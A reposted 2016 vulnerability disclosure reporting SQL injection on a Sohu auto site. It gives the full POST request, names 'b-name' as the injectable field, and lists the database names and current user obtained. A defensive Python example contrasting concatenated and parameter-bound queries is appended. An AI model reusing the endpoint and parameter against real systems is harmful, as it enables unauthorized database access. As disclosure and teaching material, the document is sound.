神刀安全网

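Vulnerability title: MySQL injection on a Sohu site (with verification script)

Vulnerability details

Disclosure status:

2016-04-30: Details reported to the vendor; awaiting vendor response
2016-04-30: Vendor confirmed; details disclosed to the vendor only
2016-05-10: Details disclosed to core white hats and experts in related fields
2016-05-20: Details disclosed to regular white hats
2016-05-30: Details disclosed to intern white hats
2016-06-14: Details disclosed to the public

Brief description:

MySQL injection on a Sohu site

Detailed description:

I tried scanning it with a tool I wrote myself.

Code block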
POST /baike_upload/handleForm.sip HTTP/1.1
Host: db.auto.sohu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://db.auto.sohu.com/baike_upload/baike_update.sip?id=31
Cookie: xxxx
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2130

carPic=&b-name=%CD%A8%B7%E7%D7%F9%D2%CE&feeling=%09%26%23160%3B%A1%BE%CB%D1%BA%FC%C6%FB%B3%B5%A1%A1%C3%FB%B4%CA%BD%E2%CA%CD%A1%BF%CD%A8%B7%E7%D7%F9%D2%CE%A3%BA%D2%BB%D6%D6%C6%FB%B3%B5%BF%D5%B5%F7%CD%A8%B7%E7%D7%F9%D2%CE%A3%AC%CB%FC%B0%FC%C0%A8%D3%D0%D2%CE%D7%F9%BA%CD%BF%BF%B1%B3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%C9%CF%B1%ED%C3%E6%D2%CE%CC%D7%CF%C2%B5%C4%D2%CE%D7%F9%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CF%C2%B2%BF%B5%C4%D7%F9%D2%CE%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%C7%B0%B1%ED%C3%E6%BF%BF%B1%B3%CC%D7%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A1%A3%CE%AA%C1%CB%CA%B9%D3%C3%B7%BD%B1%E3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B2%E0%B1%DA%C9%CF%C9%E8%D6%C3%D3%D0%BF%D8%D6%C6%D2%FD%B7%E7%BB%FA%B9%A4%D7%F7%D7%B4%CC%AC%B5%C4%CE%A2%B5%F7%BF%AA%B9%D8%A1%A3%CE%AA%C1%CB%CC%E1%B8%DF%CD%A8%B7%E7%D0%A7%B9%FB%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%C9%CF%B5%C4%D2%CE%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%B5%C4%BF%BF%B1%B3%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A1%A3%B1%BE%CA%B5%D3%C3%D0%C2%D0%CD%B5%C4%D3%D0%D2%E6%D0%A7%B9%FB%CA%C7%A3%BA%BD%E1%B9%B9%BC%F2%B5%A5%A1%A2%CA%B9%D3%C3%B7%BD%B1%E3%A1%A2%B0%B2%D7%B0%BC%BC%CA%F5%BC%F2%B5%A5%A3%AC%C7%D2%B2%BB%C6%C6%BB%B5%C6%FB%B3%B5%D2%CE%D7%D3%BD%E1%B9%B9%D3%EB%CD%E2%B9%DB%A3%AC%C4%DC%B4%EF%B5%BD%BD%DA%C4%DC%BB%B7%B1%A3%CE%C0%C9%FA%B5%C4%B9%A6%C4%DC%A1%A3%0D%0A%0D%0A%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%0D%0
A%09%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%26%23160%3B%0D%0A%09%09%0D%0A%09%0D%0A%0D%0A%0D%0A%0D%0A%09%26%23160%3B%0D%0A

Code block
Injection parameter: b-name

Proof of vulnerability:

Code block
available databases [7]:
[*] auto_bmw
[*] auto_search
[*] auto_warehouse
[*] information_schema
[*] sohu_priceinfo
[*] tmp
[*] usedcar

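Code block
Current database user: '[email protected]%'

Code block
Current database: 'auto_warehouse'

Remediation:

Filtering

Copyright notice: when reposting, please credit the source Aasron@乌云 (WooYun)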
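
As an added example (not part of the original report and not Sohu's code): a handler for the `b-name` field that decodes the GBK form body shown in the request and binds the value as a query parameter, next to the string-concatenation pattern that makes a field injectable. The `baike` table, the function names and the use of SQLite as a stand-in for MySQL are assumptions for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed samples: the b-name value from the request above, and the same
# value with a single quote (%27) appended.
BODY_OK = "carPic=&b-name=%CD%A8%B7%E7%D7%F9%D2%CE"
BODY_QUOTE = BODY_OK + "%27"


def form_field(body, field="b-name"):
    """Decode one field of a GBK form body; strict mode rejects malformed bytes."""
    fields = parse_qs(body, keep_blank_values=True, encoding="gbk", errors="strict")
    return fields.get(field, [""])[0]


def make_db():
    db = sqlite3.connect(":memory:")  # stand-in for the MySQL backend (assumption)
    db.execute("CREATE TABLE baike (id INTEGER PRIMARY KEY, name TEXT)")  # hypothetical schema
    db.execute("INSERT INTO baike (id, name) VALUES (31, '')")
    return db


def update_concat(db, entry_id, name):
    # Injectable pattern: the form value becomes part of the SQL text.
    db.execute("UPDATE baike SET name = '" + name + "' WHERE id = " + str(entry_id))


def update_bound(db, entry_id, name):
    # Hardened pattern: constant SQL text, values passed as bound parameters.
    # (MySQL drivers use %s placeholders instead of ?.)
    db.execute("UPDATE baike SET name = ? WHERE id = ?", (name, int(entry_id)))


def stored_name(db, entry_id):
    return db.execute("SELECT name FROM baike WHERE id = ?", (entry_id,)).fetchone()[0]


def concat_breaks_on_quote():
    """True if a quote in b-name reaches the SQL parser and changes the statement."""
    db = make_db()
    try:
        update_concat(db, 31, form_field(BODY_QUOTE))
    except sqlite3.OperationalError:
        return True  # the quote altered the string literal: data was parsed as SQL
    return False


if __name__ == "__main__":
    print("concatenated query breaks on quote:", concat_breaks_on_quote())
    db = make_db()
    update_bound(db, 31, form_field(BODY_QUOTE))
    print("bound query stored:", repr(stored_name(db, 31)))
```

With the bound version the quote is stored as ordinary data, so the statement's structure never depends on what the form field contains.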
